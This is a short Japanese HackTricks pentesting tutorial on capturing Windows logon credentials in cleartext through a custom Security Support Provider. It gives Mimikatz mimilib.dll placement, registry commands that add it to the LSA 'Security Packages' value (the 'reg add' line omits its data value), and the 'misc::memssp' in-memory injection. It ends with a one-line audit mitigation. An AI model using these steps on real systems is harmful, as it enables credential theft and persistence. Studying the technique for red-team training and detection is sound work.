hacktricks/windows-hardening/active-directory-methodology/custom-ssp.md
2023-07-07 23:42:27 +00:00

5.2 KiB
Raw Blame History

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

カスタムSSP

ここでSSPセキュリティサポートプロバイダとは何かを学びます。
自分自身のSSPを作成して、マシンへのアクセスに使用される資格情報をクリアテキストでキャプチャすることができます。

Mimilib

Mimikatzが提供するmimilib.dllバイナリを使用できます。これにより、すべての資格情報がクリアテキストでファイルに記録されます。
dllをC:\Windows\System32\にドロップします。
既存のLSAセキュリティパッケージのリストを取得します

{% code title="attacker@target" %}

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

{% endcode %}

セキュリティサポートプロバイダリスト(セキュリティパッケージ)にmimilib.dllを追加します:

PS C:\> reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

そして、再起動後、すべての資格情報はC:\Windows\System32\kiwissp.logに平文で見つけることができます。

メモリ内

また、Mimikatzを使用して直接メモリにインジェクトすることもできます注意少し不安定で動作しない場合があります

privilege::debug
misc::memssp

これは再起動では生き残りません。

緩和策

イベントID 4657 - HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages の作成/変更の監査

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥